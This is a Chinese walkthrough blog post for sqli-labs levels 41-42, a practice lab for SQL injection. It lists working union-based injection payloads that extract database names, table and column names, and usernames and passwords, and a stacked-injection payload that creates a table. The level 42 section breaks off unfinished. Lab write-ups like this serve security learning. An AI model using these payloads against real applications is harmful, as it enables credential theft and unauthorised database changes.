首页 > 数据库技术 > 详细

sql-lib闯关秘籍之41-50关

时间:2020-01-27 12:11:12      阅读:94      评论:0      收藏:0      [点我收藏+]

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关sql-lib闯关秘籍之11-20关sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之41-50关

不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!

以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~

第四十一关

这关和第三十九关一样,只是错误没有回显

获得版本和数据库名   ?id=0 union select 1,version(),database() %23

获得表名    ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名     ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获取用户名密码  ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

技术分享图片

 

 也是可以堆叠注入的,堆叠注入语句   ?id=1;create table test41 like users;%23

 第四十二关

 熟悉的界面、

技术分享图片

本来想注册,但是好像不能

技术分享图片

 

 

 这一关因为user设置了过滤函数mysqli_real_escape_string()
所以我们在密码处构造

 

41-50关结束

该文章有参考了以下的网页:

 

SQL注入靶场sqli-labs 1-65关全部通关教程

SQLi_Labs通关文档【1-65关】

 sqli-labs 1-65教程

sql-lib闯关秘籍之41-50关

原文:https://www.cnblogs.com/longshisan/p/12235597.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!